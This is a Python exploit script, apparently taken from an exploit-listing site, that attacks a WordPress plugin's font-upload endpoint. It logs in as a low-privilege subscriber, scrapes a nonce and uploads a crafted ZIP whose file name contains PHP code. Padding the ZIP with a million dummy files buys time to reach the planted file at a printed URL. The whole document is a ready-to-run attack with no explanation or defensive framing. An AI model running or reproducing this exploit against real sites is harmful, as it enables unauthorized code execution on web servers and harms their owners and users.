## https://sploitus.com/exploit?id=WPEX-ID:C837EAF3-FAFD-45A2-8F5E-03AFB28A765B
from io import BytesIO
import requests
import zipfile
import sys
import re
if len(sys.argv) != 4:
print('USAGE: python %s <target_url> <user_login> <user_pass>' % (sys.argv[0],))
sys.exit()
url = sys.argv[1].rstrip('/')
with requests.Session() as s:
'''
This exploit requires an account on the site (subscriber+)
'''
print('Logging in..')
# Log into WordPress using our Subscriber account
res = s.post(
url + '/wp-login.php',
headers={ 'Cookie': 'wordpress_test_cookie=WP Cookie check' },
data={'log':sys.argv[2], 'pwd':sys.argv[3], 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie':1})
print('Leaking nonce..')
# Leak nonce
nonce = re.search(r'GSF_META_DATA.*"nonce":"([0-9a-f]+)"', s.get(url + '/wp-admin/profile.php?action=delete').text)
if not nonce:
print('Couldn\'t find nonce!')
sys.exit()
nonce = nonce.group(1)
print('Creating malicious ZIP file..')
# Create a zip file in memory
zip_buffer = BytesIO()
with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file:
# Malicious file whose name will launch phpinfo() later
zip_file.writestr('<?php phpinfo();die();__halt_compiler();?>', '')
# Add an empty style.css file
zip_file.writestr('style.css', '')
# A lot of useless file to give the user time to access the uploaded shell
for i in range(1000000):
zip_file.writestr(f'{i}.woff', 'A')
# Seek back to the beginning of the buffer
zip_buffer.seek(0)
print(f'Sending malicious font: Time to access {url}/wp-content/uploads/gsf-fonts/phpinfo.php in your browser!')
# Send malicious request uploading our shell
print(s.post(
url + '/wp-admin/admin-ajax.php?action=gsf_upload_fonts',
data={'_nonce': nonce, 'name': 'malicious_font2'},
files={'file_font': ('phpinfo.php', zip_buffer, 'application/zip')}).text)